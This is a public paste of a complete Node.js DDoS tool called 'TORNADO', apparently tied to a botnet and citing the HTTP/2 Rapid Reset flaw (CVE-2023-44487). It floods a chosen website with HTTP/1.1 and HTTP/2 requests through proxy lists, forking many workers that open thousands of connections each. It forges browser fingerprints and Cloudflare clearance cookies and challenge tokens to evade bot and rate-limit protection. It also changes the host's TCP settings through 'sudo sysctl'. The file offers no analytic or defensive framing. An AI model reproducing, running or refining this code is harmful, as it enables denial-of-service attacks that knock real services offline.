G

Untitled

public
Guest Jun 11, 2024 Never 11
Clone
Plaintext paste1.txt 763 lines (650 loc) | 33.93 KB
1
// made by @rapidreset aka mitigations for mesh botnet
2
const net = require('net');
3
const tls = require('tls');
4
const HPACK = require('hpack');
5
const cluster = require('cluster');
6
const fs = require('fs');
7
const os = require('os');
8
const crypto = require('crypto');
9
const { exec } = require('child_process');
10
11
const ignoreNames = ['RequestError', 'StatusCodeError', 'CaptchaError', 'CloudflareError', 'ParseError', 'ParserError', 'TimeoutError', 'JSONError', 'URLError', 'InvalidURL', 'ProxyError'];
12
const ignoreCodes = ['SELF_SIGNED_CERT_IN_CHAIN', 'ECONNRESET', 'ERR_ASSERTION', 'ECONNREFUSED', 'EPIPE', 'EHOSTUNREACH', 'ETIMEDOUT', 'ESOCKETTIMEDOUT', 'EPROTO', 'EAI_AGAIN', 'EHOSTDOWN', 'ENETRESET', 'ENETUNREACH', 'ENONET', 'ENOTCONN', 'ENOTFOUND', 'EAI_NODATA', 'EAI_NONAME', 'EADDRNOTAVAIL', 'EAFNOSUPPORT', 'EALREADY', 'EBADF', 'ECONNABORTED', 'EDESTADDRREQ', 'EDQUOT', 'EFAULT', 'EHOSTUNREACH', 'EIDRM', 'EILSEQ', 'EINPROGRESS', 'EINTR', 'EINVAL', 'EIO', 'EISCONN', 'EMFILE', 'EMLINK', 'EMSGSIZE', 'ENAMETOOLONG', 'ENETDOWN', 'ENOBUFS', 'ENODEV', 'ENOENT', 'ENOMEM', 'ENOPROTOOPT', 'ENOSPC', 'ENOSYS', 'ENOTDIR', 'ENOTEMPTY', 'ENOTSOCK', 'EOPNOTSUPP', 'EPERM', 'EPIPE', 'EPROTONOSUPPORT', 'ERANGE', 'EROFS', 'ESHUTDOWN', 'ESPIPE', 'ESRCH', 'ETIME', 'ETXTBSY', 'EXDEV', 'UNKNOWN', 'DEPTH_ZERO_SELF_SIGNED_CERT', 'UNABLE_TO_VERIFY_LEAF_SIGNATURE', 'CERT_HAS_EXPIRED', 'CERT_NOT_YET_VALID', 'ERR_SOCKET_BAD_PORT'];
13
14
require("events").EventEmitter.defaultMaxListeners = Number.MAX_VALUE;
15
16
process
17
.setMaxListeners(0)
18
.on('uncaughtException', function (e) {
19
console.log(e)
20
if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return false;
21
})
22
.on('unhandledRejection', function (e) {
23
if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return false;
24
})
25
.on('warning', e => {
26
if (e.code && ignoreCodes.includes(e.code) || e.name && ignoreNames.includes(e.name)) return false;
27
})
28
.on("SIGHUP", () => {
29
return 1;
30
})
31
.on("SIGCHILD", () => {
32
return 1;
33
});
34
35
const statusesQ = []
36
let statuses = {}
37
let isFull = process.argv.includes('--full');
38
let custom_table = 65535;
39
let custom_window = 6291456;
40
let custom_header = 262144;
41
let custom_update = 15663105;
42
let timer = 0;
43
44
45
const timestamp = Date.now();
46
const timestampString = timestamp.toString().substring(0, 10);
47
const currentDate = new Date();
48
const targetDate = new Date('2024-03-30');
49
50
const PREFACE = "PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n";
51
const reqmethod = process.argv[2];
52
const target = process.argv[3];
53
const time = process.argv[4];
54
const threads = process.argv[5];
55
const ratelimit = process.argv[6];
56
const proxyfile = process.argv[7];
57
const queryIndex = process.argv.indexOf('--query');
58
const query = queryIndex !== -1 && queryIndex + 1 < process.argv.length ? process.argv[queryIndex + 1] : undefined;
59
const bfmFlagIndex = process.argv.indexOf('--bfm');
60
const bfmFlag = bfmFlagIndex !== -1 && bfmFlagIndex + 1 < process.argv.length ? process.argv[bfmFlagIndex + 1] : undefined;
61
const delayIndex = process.argv.indexOf('--delay');
62
const delay = delayIndex !== -1 && delayIndex + 1 < process.argv.length ? parseInt(process.argv[delayIndex + 1]) : 0;
63
const cookieIndex = process.argv.indexOf('--cookie');
64
const cookieValue = cookieIndex !== -1 && cookieIndex + 1 < process.argv.length ? process.argv[cookieIndex + 1] : undefined;
65
const refererIndex = process.argv.indexOf('--referer');
66
const refererValue = refererIndex !== -1 && refererIndex + 1 < process.argv.length ? process.argv[refererIndex + 1] : undefined;
67
const postdataIndex = process.argv.indexOf('--postdata');
68
const postdata = postdataIndex !== -1 && postdataIndex + 1 < process.argv.length ? process.argv[postdataIndex + 1] : undefined;
69
const randrateIndex = process.argv.indexOf('--randrate');
70
const randrate = randrateIndex !== -1 && randrateIndex + 1 < process.argv.length ? process.argv[randrateIndex + 1] : undefined;
71
const customHeadersIndex = process.argv.indexOf('--header');
72
const customHeaders = customHeadersIndex !== -1 && customHeadersIndex + 1 < process.argv.length ? process.argv[customHeadersIndex + 1] : undefined;
73
74
const customIPindex = process.argv.indexOf('--ip');
75
const customIP = customIPindex !== -1 && customIPindex + 1 < process.argv.length ? process.argv[customIPindex + 1] : undefined;
76
77
const customUAindex = process.argv.indexOf('--useragent');
78
const customUA = customUAindex !== -1 && customUAindex + 1 < process.argv.length ? process.argv[customUAindex + 1] : undefined;
79
80
const forceHttpIndex = process.argv.indexOf('--http');
81
const useLegitHeaders = process.argv.includes('--legit');
82
const forceHttp = forceHttpIndex !== -1 && forceHttpIndex + 1 < process.argv.length ? process.argv[forceHttpIndex + 1] == "mix" ? undefined : parseInt(process.argv[forceHttpIndex + 1]) : "2";
83
const debugMode = process.argv.includes('--debug') && forceHttp != 1;
84
85
if (!reqmethod || !target || !time || !threads || !ratelimit || !proxyfile) {
86
console.clear();
87
console.error(`
88
TORNADO v2.1 Method With RST STREAM (CVE-2023-44487) // Updated: 01.05.2024 // With love @resetcve
89
Developers to method: @resetcve - developer method // @shiftwise - recoding method
90
How to use & example:
91
node ${process.argv[1]} <GET/POST> <target> <time> <threads> <ratelimit> <proxy>
92
node ${process.argv[1]} GET "https://target.com?q=%RAND%" 120 16 90 proxy.txt --query 1 --cookie "uh=good" --delay 1 --bfm true --referer rand --postdata "user=f&pass=%RAND%" --debug --randrate --full
93
94
Options:
95
--query 1/2/3 - query string with rand ex 1 - ?cf__chl_tk 2 - ?fwfwfwfw 3 - ?q=fwfwwffw
96
--delay <1-1000> - delay between requests 1-100 ms (optimal) default 1 ms
97
--cookie "f=f" - for custom cookie - also cookie support %RAND% ex: "bypassing=%RAND%"
98
--bfm true/null - bot fight mode change to true if you need dont use if no need
99
--referer https://target.com / rand - use custom referer if you need and rand - if you need generate domains ex: fwfwwfwfw.net
100
--postdata "user=f&pass=%RAND%" - if you need data to post req method format "user=f&pass=f"
101
--randrate - randomizer rate 1 to 90 good bypass to rate
102
--full - this new func for attack only big backend ex amazon akamai and other... support cf
103
--http 1/2/mix - new func choose to type http 1/2/mix (mix 1 & 2)
104
--debug - show your status code (maybe low rps to use more resource)
105
--header "f:f" or "f:f#f1:f1" - if you need this use custom headers split each header with #
106
--legit - this new func for attack with full legit headers non for cf
107
`);
108
process.exit(1);
109
}
110
111
let hcookie = '';
112
113
const url = new URL(target)
114
const proxy = fs.readFileSync(proxyfile, 'utf8').replace(/\r/g, '').split('\n')
115
116
if (!['GET', 'POST', 'HEAD', 'OPTIONS'].includes(reqmethod)) {
117
console.error('Error request method only can GET/POST/HEAD/OPTIONS');
118
process.exit(1);
119
}
120
121
if (!target.startsWith('https://') && !target.startsWith('http://')) {
122
console.error('Error protocol can only https:// or http://');
123
process.exit(1);
124
}
125
126
if (isNaN(time) || time <= 0) {
127
console.error('Error invalid time format')
128
process.exit(1);
129
}
130
131
if (isNaN(threads) || threads <= 0 || threads > 256) {
132
console.error('Error threads format')
133
process.exit(1);
134
}
135
136
if (isNaN(ratelimit) || ratelimit <= 0) {
137
console.error(`Error ratelimit format`)
138
process.exit(1);
139
}
140
141
if (bfmFlag && bfmFlag.toLowerCase() === 'true') {
142
hcookie = `cf_clearance=${randstr(22)}_${randstr(1)}.${randstr(3)}.${randstr(14)}-${timestampString}-1.0-${randstr(6)}+${randstr(80)}=`;
143
}
144
145
if (cookieValue) {
146
if (cookieValue === '%RAND%') {
147
hcookie = hcookie ? `${hcookie}; ${ememmmmmemmeme(6, 6)}` : ememmmmmemmeme(6, 6);
148
} else {
149
hcookie = hcookie ? `${hcookie}; ${cookieValue}` : cookieValue;
150
}
151
}
152
153
function encodeFrame(streamId, type, payload = "", flags = 0) {
154
let frame = Buffer.alloc(9)
155
frame.writeUInt32BE(payload.length << 8 | type, 0)
156
frame.writeUInt8(flags, 4)
157
frame.writeUInt32BE(streamId, 5)
158
if (payload.length > 0)
159
frame = Buffer.concat([frame, payload])
160
return frame
161
}
162
163
function decodeFrame(data) {
164
const lengthAndType = data.readUInt32BE(0)
165
const length = lengthAndType >> 8
166
const type = lengthAndType & 0xFF
167
const flags = data.readUint8(4)
168
const streamId = data.readUInt32BE(5)
169
const offset = flags & 0x20 ? 5 : 0
170
171
let payload = Buffer.alloc(0)
172
173
if (length > 0) {
174
payload = data.subarray(9 + offset, 9 + offset + length)
175
176
if (payload.length + offset != length) {
177
return null
178
}
179
}
180
181
return {
182
streamId,
183
length,
184
type,
185
flags,
186
payload
187
}
188
}
189
190
function encodeSettings(settings) {
191
const data = Buffer.alloc(6 * settings.length)
192
for (let i = 0; i < settings.length; i++) {
193
data.writeUInt16BE(settings[i][0], i * 6)
194
data.writeUInt32BE(settings[i][1], i * 6 + 2)
195
}
196
return data
197
}
198
199
function encodeRstStream(streamId, type, flags) {
200
const frameHeader = Buffer.alloc(9);
201
frameHeader.writeUInt32BE(4, 0);
202
frameHeader.writeUInt8(type, 4);
203
frameHeader.writeUInt8(flags, 5);
204
frameHeader.writeUInt32BE(streamId, 5);
205
const statusCode = Buffer.alloc(4).fill(0);
206
return Buffer.concat([frameHeader, statusCode]);
207
}
208
209
const getRandomChar = () => {
210
const pizda4 = 'abcdefghijklmnopqrstuvwxyz';
211
const randomIndex = Math.floor(Math.random() * pizda4.length);
212
return pizda4[randomIndex];
213
};
214
215
function randstr(length) {
216
const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
217
let result = "";
218
const charactersLength = characters.length;
219
for (let i = 0; i < length; i++) {
220
result += characters.charAt(Math.floor(Math.random() * charactersLength));
221
}
222
return result;
223
}
224
225
if (url.pathname.includes("%RAND%")) {
226
const randomValue = randstr(6) + "&" + randstr(6);
227
url.pathname = url.pathname.replace("%RAND%", randomValue);
228
}
229
230
function randstrr(length) {
231
const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-";
232
let result = "";
233
const charactersLength = characters.length;
234
for (let i = 0; i < length; i++) {
235
result += characters.charAt(Math.floor(Math.random() * charactersLength));
236
}
237
return result;
238
}
239
240
function generateRandomString(minLength, maxLength) {
241
const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
242
const length = Math.floor(Math.random() * (maxLength - minLength + 1)) + minLength;
243
let result = '';
244
for (let i = 0; i < length; i++) {
245
const randomIndex = Math.floor(Math.random() * characters.length);
246
result += characters[randomIndex];
247
}
248
return result;
249
}
250
251
function ememmmmmemmeme(minLength, maxLength) {
252
const characters = 'abcdefghijklmnopqrstuvwxyz';
253
const length = Math.floor(Math.random() * (maxLength - minLength + 1)) + minLength;
254
let result = '';
255
for (let i = 0; i < length; i++) {
256
const randomIndex = Math.floor(Math.random() * characters.length);
257
result += characters[randomIndex];
258
}
259
return result;
260
}
261
262
function getRandomInt(min, max) {
263
return Math.floor(Math.random() * (max - min + 1)) + min;
264
}
265
266
function buildRequest() {
267
const browserVersion = getRandomInt(120, 123);
268
269
const fwfw = ['Google Chrome', 'Brave'];
270
const wfwf = fwfw[Math.floor(Math.random() * fwfw.length)];
271
272
let brandValue;
273
if (browserVersion === 120) {
274
brandValue = `"Not_A Brand";v="8", "Chromium";v="${browserVersion}", "${wfwf}";v="${browserVersion}"`;
275
}
276
else if (browserVersion === 121) {
277
brandValue = `"Not A(Brand";v="99", "${wfwf}";v="${browserVersion}", "Chromium";v="${browserVersion}"`;
278
}
279
else if (browserVersion === 122) {
280
brandValue = `"Chromium";v="${browserVersion}", "Not(A:Brand";v="24", "${wfwf}";v="${browserVersion}"`;
281
}
282
else if (browserVersion === 123) {
283
brandValue = `"${wfwf}";v="${browserVersion}", "Not:A-Brand";v="8", "Chromium";v="${browserVersion}"`;
284
}
285
286
const isBrave = wfwf === 'Brave';
287
288
const acceptHeaderValue = isBrave
289
? 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8'
290
: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7';
291
292
293
const langValue = isBrave
294
? 'en-US,en;q=0.6'
295
: 'en-US,en;q=0.7';
296
297
const userAgent = `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/${browserVersion}.0.0.0 Safari/537.36`;
298
const secChUa = `${brandValue}`;
299
const currentRefererValue = refererValue === 'rand' ? 'https://' + ememmmmmemmeme(6, 6) + ".net" : refererValue;
300
301
let mysor = '\r\n';
302
let mysor1 = '\r\n';
303
if (hcookie || currentRefererValue) {
304
mysor = '\r\n'
305
mysor1 = '';
306
} else {
307
mysor = '';
308
mysor1 = '\r\n';
309
}
310
311
let headers = `${reqmethod} ${url.pathname} HTTP/1.1\r\n` +
312
`Accept: ${acceptHeaderValue}\r\n` +
313
'Accept-Encoding: gzip, deflate, br\r\n' +
314
`Accept-Language: ${langValue}\r\n` +
315
'Cache-Control: max-age=0\r\n' +
316
'Connection: Keep-Alive\r\n' +
317
`Host: ${url.hostname}\r\n` +
318
'Sec-Fetch-Dest: document\r\n' +
319
'Sec-Fetch-Mode: navigate\r\n' +
320
'Sec-Fetch-Site: none\r\n' +
321
'Sec-Fetch-User: ?1\r\n' +
322
'Upgrade-Insecure-Requests: 1\r\n' +
323
`User-Agent: ${userAgent}\r\n` +
324
`sec-ch-ua: ${secChUa}\r\n` +
325
'sec-ch-ua-mobile: ?0\r\n' +
326
'sec-ch-ua-platform: "Windows"\r\n' + mysor1;
327
328
if (hcookie) {
329
headers += `Cookie: ${hcookie}\r\n`;
330
}
331
332
if (currentRefererValue) {
333
headers += `Referer: ${currentRefererValue}\r\n` + mysor;
334
}
335
336
const mmm = Buffer.from(`${headers}`, 'binary');
337
//console.log(headers.toString());
338
return mmm;
339
}
340
341
const http1Payload = Buffer.concat(new Array(1).fill(buildRequest()))
342
343
function go() {
344
var [proxyHost, proxyPort] = '1.1.1.1:3128';
345
346
if(customIP) {
347
[proxyHost, proxyPort] = customIP.split(':');
348
} else {
349
[proxyHost, proxyPort] = proxy[~~(Math.random() * proxy.length)].split(':');
350
}
351
352
let tlsSocket;
353
354
if (!proxyPort || isNaN(proxyPort)) {
355
go()
356
return
357
}
358
359
const netSocket = net.connect(Number(proxyPort), proxyHost, () => {
360
netSocket.once('data', () => {
361
tlsSocket = tls.connect({
362
socket: netSocket,
363
ALPNProtocols: forceHttp === 1 ? ['http/1.1'] : forceHttp === 2 ? ['h2'] : forceHttp === undefined ? Math.random() >= 0.5 ? ['h2'] : ['http/1.1'] : ['h2', 'http/1.1'],
364
servername: url.host,
365
ciphers: 'TLS_AES_128_GCM_SHA256:TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384',
366
sigalgs: 'ecdsa_secp256r1_sha256:rsa_pss_rsae_sha256:rsa_pkcs1_sha256',
367
secureOptions: crypto.constants.SSL_OP_NO_RENEGOTIATION | crypto.constants.SSL_OP_NO_TICKET | crypto.constants.SSL_OP_NO_SSLv2 | crypto.constants.SSL_OP_NO_SSLv3 | crypto.constants.SSL_OP_NO_COMPRESSION | crypto.constants.SSL_OP_NO_RENEGOTIATION | crypto.constants.SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION | crypto.constants.SSL_OP_TLSEXT_PADDING | crypto.constants.SSL_OP_ALL | crypto.constants.SSLcom,
368
secure: true,
369
minVersion: 'TLSv1.2',
370
maxVersion: 'TLSv1.3',
371
rejectUnauthorized: false
372
}, () => {
373
if (!tlsSocket.alpnProtocol || tlsSocket.alpnProtocol == 'http/1.1') {
374
375
if (forceHttp == 2) {
376
tlsSocket.end(() => tlsSocket.destroy())
377
return
378
}
379
380
function doWrite() {
381
tlsSocket.write(http1Payload, (err) => {
382
if (!err) {
383
setTimeout(() => {
384
doWrite()
385
}, isFull ? 1000 : 1000 / ratelimit)
386
} else {
387
tlsSocket.end(() => tlsSocket.destroy())
388
}
389
})
390
}
391
392
doWrite()
393
394
tlsSocket.on('error', () => {
395
tlsSocket.end(() => tlsSocket.destroy())
396
})
397
return
398
}
399
400
if (forceHttp == 1) {
401
tlsSocket.end(() => tlsSocket.destroy())
402
return
403
}
404
405
let streamId = 1
406
let data = Buffer.alloc(0)
407
let hpack = new HPACK()
408
hpack.setTableSize(4096)
409
410
const updateWindow = Buffer.alloc(4)
411
updateWindow.writeUInt32BE(custom_update, 0)
412
413
const frames = [
414
Buffer.from(PREFACE, 'binary'),
415
encodeFrame(0, 4, encodeSettings([
416
[1, custom_header],
417
[2, 0],
418
[4, custom_window],
419
[6, custom_table]
420
])),
421
encodeFrame(0, 8, updateWindow)
422
];
423
424
tlsSocket.on('data', (eventData) => {
425
data = Buffer.concat([data, eventData])
426
427
while (data.length >= 9) {
428
const frame = decodeFrame(data)
429
if (frame != null) {
430
data = data.subarray(frame.length + 9)
431
if (frame.type == 4 && frame.flags == 0) {
432
tlsSocket.write(encodeFrame(0, 4, "", 1))
433
}
434
if (frame.type == 1 && debugMode) {
435
const status = hpack.decode(frame.payload).find(x => x[0] == ':status')[1]
436
if (!statuses[status])
437
statuses[status] = 0
438
439
statuses[status]++
440
}
441
if (frame.type == 7 || frame.type == 5) {
442
if (frame.type == 7) {
443
if (debugMode) {
444
445
//console.log("goaway", frame.payload.readUint32BE(0), frame.payload.readUint32BE(4))
446
447
if (!statuses["GOAWAY"])
448
statuses["GOAWAY"] = 0
449
450
statuses["GOAWAY"]++
451
}
452
}
453
tlsSocket.write(encodeRstStream(0, 3, 0)); // beta
454
tlsSocket.end(() => tlsSocket.destroy()) // still beta
455
}
456
457
} else {
458
break
459
}
460
}
461
})
462
463
tlsSocket.write(Buffer.concat(frames))
464
465
function doWrite() {
466
if (tlsSocket.destroyed) {
467
return
468
}
469
//const fwq = getRandomInt(0,1);
470
const requests = []
471
const customHeadersArray = [];
472
if (customHeaders) {
473
const customHeadersList = customHeaders.split('#');
474
for (const header of customHeadersList) {
475
const [name, value] = header.split(':');
476
if (name && value) {
477
customHeadersArray.push({ [name.trim().toLowerCase()]: value.trim() });
478
}
479
}
480
}
481
let ratelimit;
482
if (randrate !== undefined) {
483
ratelimit = getRandomInt(1, 59);
484
} else {
485
ratelimit = process.argv[6];
486
}
487
for (let i = 0; i < (isFull ? ratelimit : 1); i++) {
488
const browserVersion = getRandomInt(120, 123);
489
490
const fwfw = ['Google Chrome', 'Brave'];
491
const wfwf = fwfw[Math.floor(Math.random() * fwfw.length)];
492
const ref = ["same-site", "same-origin", "cross-site"];
493
const ref1 = ref[Math.floor(Math.random() * ref.length)];
494
495
let brandValue;
496
if (browserVersion === 120) {
497
brandValue = `\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"${browserVersion}\", \"${wfwf}\";v=\"${browserVersion}\"`;
498
} else if (browserVersion === 121) {
499
brandValue = `\"Not A(Brand\";v=\"99\", \"${wfwf}\";v=\"${browserVersion}\", \"Chromium\";v=\"${browserVersion}\"`;
500
}
501
else if (browserVersion === 122) {
502
brandValue = `\"Chromium\";v=\"${browserVersion}\", \"Not(A:Brand\";v=\"24\", \"${wfwf}\";v=\"${browserVersion}\"`;
503
}
504
else if (browserVersion === 123) {
505
brandValue = `\"${wfwf}\";v=\"${browserVersion}\", \"Not:A-Brand\";v=\"8\", \"Chromium\";v=\"${browserVersion}\"`;
506
}
507
508
const isBrave = wfwf === 'Brave';
509
510
const acceptHeaderValue = isBrave
511
? 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8'
512
: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7';
513
514
const langValue = isBrave
515
? 'en-US,en;q=0.9'
516
: 'en-US,en;q=0.7';
517
518
const secGpcValue = isBrave ? "1" : undefined;
519
520
const secChUaModel = isBrave ? '""' : undefined;
521
const secChUaPlatform = isBrave ? 'Windows' : undefined;
522
const secChUaPlatformVersion = isBrave ? '10.0.0' : undefined;
523
const secChUaMobile = isBrave ? '?0' : undefined;
524
525
var userAgent = `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/${browserVersion}.0.0.0 Safari/537.36`;
526
527
if(customUA) {
528
userAgent = customUA;
529
} else {
530
userAgent = `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/${browserVersion}.0.0.0 Safari/537.36`;
531
}
532
533
const secChUa = `${brandValue}`;
534
const currentRefererValue = refererValue === 'rand' ? 'https://' + ememmmmmemmeme(6, 6) + ".net" : refererValue;
535
const headers = Object.entries({
536
":method": reqmethod,
537
":authority": url.hostname,
538
":scheme": "https",
539
":path": query ? handleQuery(query) : url.pathname + (postdata ? `?${postdata}` : ""),
540
}).concat(Object.entries({
541
...(Math.random() < 0.4 && { "cache-control": "max-age=0" }),
542
...(reqmethod === "POST" && { "content-length": "0" }),
543
"sec-ch-ua": secChUa,
544
"sec-ch-ua-mobile": "?0",
545
"sec-ch-ua-platform": `\"Windows\"`,
546
"upgrade-insecure-requests": "1",
547
"user-agent": userAgent,
548
"accept": acceptHeaderValue,
549
...(secGpcValue && { "sec-gpc": secGpcValue }),
550
...(secChUaMobile && { "sec-ch-ua-mobile": secChUaMobile }),
551
...(secChUaModel && { "sec-ch-ua-model": secChUaModel }),
552
...(secChUaPlatform && { "sec-ch-ua-platform": secChUaPlatform }),
553
...(secChUaPlatformVersion && { "sec-ch-ua-platform-version": secChUaPlatformVersion }),
554
...(Math.random() < 0.5 && { "sec-fetch-site": currentRefererValue ? ref1 : "none" }),
555
...(Math.random() < 0.5 && { "sec-fetch-mode": "navigate" }),
556
...(Math.random() < 0.5 && { "sec-fetch-user": "?1" }),
557
...(Math.random() < 0.5 && { "sec-fetch-dest": "document" }),
558
"accept-encoding": "gzip, deflate, br",
559
"accept-language": langValue,
560
...(hcookie && { "cookie": hcookie }),
561
...(currentRefererValue && { "referer": currentRefererValue }),
562
...customHeadersArray.reduce((acc, header) => ({ ...acc, ...header }), {})
563
}).filter(a => a[1] != null));
564
565
const headers3 = Object.entries({
566
":method": reqmethod,
567
":authority": url.hostname,
568
":scheme": "https",
569
":path": query ? handleQuery(query) : url.pathname + (postdata ? `?${postdata}` : ""),
570
}).concat(Object.entries({
571
...(Math.random() < 0.4 && { "cache-control": "max-age=0" }),
572
...(reqmethod === "POST" && { "content-length": "0" }),
573
"sec-ch-ua": secChUa,
574
"sec-ch-ua-mobile": "?0",
575
"sec-ch-ua-platform": `\"Windows\"`,
576
"upgrade-insecure-requests": "1",
577
"user-agent": userAgent,
578
"accept": acceptHeaderValue,
579
...(secGpcValue && { "sec-gpc": secGpcValue }),
580
...(secChUaMobile && { "sec-ch-ua-mobile": secChUaMobile }),
581
...(secChUaModel && { "sec-ch-ua-model": secChUaModel }),
582
...(secChUaPlatform && { "sec-ch-ua-platform": secChUaPlatform }),
583
...(secChUaPlatformVersion && { "sec-ch-ua-platform-version": secChUaPlatformVersion }),
584
"sec-fetch-site": currentRefererValue ? ref1 : "none",
585
"sec-fetch-mode": "navigate",
586
"sec-fetch-user": "?1",
587
"sec-fetch-dest": "document",
588
"accept-encoding": "gzip, deflate, br",
589
"accept-language": langValue,
590
//...(Math.random() < 0.4 && { "priority": `u=${fwq}, i` }),
591
...(hcookie && { "cookie": hcookie }),
592
...(currentRefererValue && { "referer": currentRefererValue }),
593
...customHeadersArray.reduce((acc, header) => ({ ...acc, ...header }), {})
594
}).filter(a => a[1] != null));
595
596
const headers2 = Object.entries({
597
...(Math.random() < 0.3 && { [`x-client-session${getRandomChar()}`]: `none${getRandomChar()}` }),
598
...(Math.random() < 0.3 && { [`sec-ms-gec-version${getRandomChar()}`]: `undefined${getRandomChar()}` }),
599
...(Math.random() < 0.3 && { [`sec-fetch-users${getRandomChar()}`]: `?0${getRandomChar()}` }),
600
...(Math.random() < 0.3 && { [`x-request-data${getRandomChar()}`]: `dynamic${getRandomChar()}` }),
601
}).filter(a => a[1] != null);
602
603
for (let i = headers2.length - 1; i > 0; i--) {
604
const j = Math.floor(Math.random() * (i + 1));
605
[headers2[i], headers2[j]] = [headers2[j], headers2[i]];
606
}
607
608
const combinedHeaders = useLegitHeaders ? headers3.concat() : headers.concat(headers2);
609
610
function handleQuery(query) {
611
if (query === '1') {
612
return url.pathname + '?__cf_chl_rt_tk=' + randstrr(30) + '_' + randstrr(12) + '-' + timestampString + '-0-' + 'gaNy' + randstrr(8);
613
} else if (query === '2') {
614
return url.pathname + '?' + generateRandomString(6, 7) + '&' + generateRandomString(6, 7);
615
} else if (query === '3') {
616
return url.pathname + '?q=' + generateRandomString(6, 7) + '&' + generateRandomString(6, 7);
617
} else {
618
return url.pathname;
619
}
620
}
621
622
const packed = Buffer.concat([
623
Buffer.from([0x80, 0, 0, 0, 0xFF]),
624
hpack.encode(combinedHeaders)
625
]);
626
627
requests.push(encodeFrame(streamId, 1, packed, 0x25));
628
streamId += 2
629
}
630
631
tlsSocket.write(Buffer.concat(requests), (err) => {
632
if (!err) {
633
setTimeout(() => {
634
doWrite()
635
}, isFull ? 1000 : 1000 / ratelimit)
636
}
637
})
638
}
639
640
doWrite()
641
}).on('error', () => {
642
tlsSocket.destroy()
643
})
644
})
645
646
netSocket.write(`CONNECT ${url.host}:443 HTTP/1.1\r\nHost: ${url.host}:443\r\nProxy-Connection: Keep-Alive\r\n\r\n`)
647
}).once('error', () => { }).once('close', () => {
648
if (tlsSocket) {
649
tlsSocket.end(() => { tlsSocket.destroy(); go() })
650
}
651
})
652
}
653
654
function TCP_CHANGES_SERVER() {
655
const congestionControlOptions = ['cubic', 'reno', 'bbr', 'dctcp', 'hybla'];
656
const sackOptions = ['1', '0'];
657
const windowScalingOptions = ['1', '0'];
658
const timestampsOptions = ['1', '0'];
659
const selectiveAckOptions = ['1', '0'];
660
const tcpFastOpenOptions = ['3', '2', '1', '0'];
661
662
const congestionControl = congestionControlOptions[Math.floor(Math.random() * congestionControlOptions.length)];
663
const sack = sackOptions[Math.floor(Math.random() * sackOptions.length)];
664
const windowScaling = windowScalingOptions[Math.floor(Math.random() * windowScalingOptions.length)];
665
const timestamps = timestampsOptions[Math.floor(Math.random() * timestampsOptions.length)];
666
const selectiveAck = selectiveAckOptions[Math.floor(Math.random() * selectiveAckOptions.length)];
667
const tcpFastOpen = tcpFastOpenOptions[Math.floor(Math.random() * tcpFastOpenOptions.length)];
668
669
const command = `sudo sysctl -w net.ipv4.tcp_congestion_control=${congestionControl} \
670
net.ipv4.tcp_sack=${sack} \
671
net.ipv4.tcp_window_scaling=${windowScaling} \
672
net.ipv4.tcp_timestamps=${timestamps} \
673
net.ipv4.tcp_sack=${selectiveAck} \
674
net.ipv4.tcp_fastopen=${tcpFastOpen}`;
675
676
exec(command, () => { });
677
}
678
679
setInterval(() => {
680
timer++;
681
}, 1000);
682
683
setInterval(() => {
684
if (timer <= 10) {
685
custom_header = custom_header + 1;
686
custom_window = custom_window + 1;
687
custom_table = custom_table + 1;
688
custom_update = custom_update + 1;
689
} else {
690
custom_table = 65536;
691
custom_window = 6291456;
692
custom_header = 262144;
693
custom_update = 15663105;
694
timer = 0;
695
}
696
}, 10000);
697
698
if (cluster.isMaster) {
699
700
const workers = {}
701
702
Array.from({ length: threads }, (_, i) => cluster.fork({ core: i % os.cpus().length }));
703
console.log(`Attack Start / @rapidreset love you <3 / TORNADO v1.5 (Beta Version)`);
704
705
cluster.on('exit', (worker) => {
706
cluster.fork({ core: worker.id % os.cpus().length });
707
});
708
709
cluster.on('message', (worker, message) => {
710
workers[worker.id] = [worker, message]
711
})
712
if (debugMode) {
713
setInterval(() => {
714
715
let statuses = {}
716
for (let w in workers) {
717
if (workers[w][0].state == 'online') {
718
for (let st of workers[w][1]) {
719
for (let code in st) {
720
if (statuses[code] == null)
721
statuses[code] = 0
722
723
statuses[code] += st[code]
724
}
725
}
726
}
727
}
728
console.clear()
729
console.log(new Date().toLocaleString('us'), statuses)
730
}, 1000)
731
}
732
733
setInterval(TCP_CHANGES_SERVER, 5000);
734
setTimeout(() => process.exit(1), time * 1000);
735
736
} else {
737
let conns = 0
738
739
let i = setInterval(() => {
740
if (conns < 30000) {
741
conns++
742
743
} else {
744
clearInterval(i)
745
return
746
}
747
go()
748
}, delay);
749
750
751
if (debugMode) {
752
setInterval(() => {
753
if (statusesQ.length >= 4)
754
statusesQ.shift()
755
756
statusesQ.push(statuses)
757
statuses = {}
758
process.send(statusesQ)
759
}, 250)
760
}
761
762
setTimeout(() => process.exit(1), time * 1000);
763
}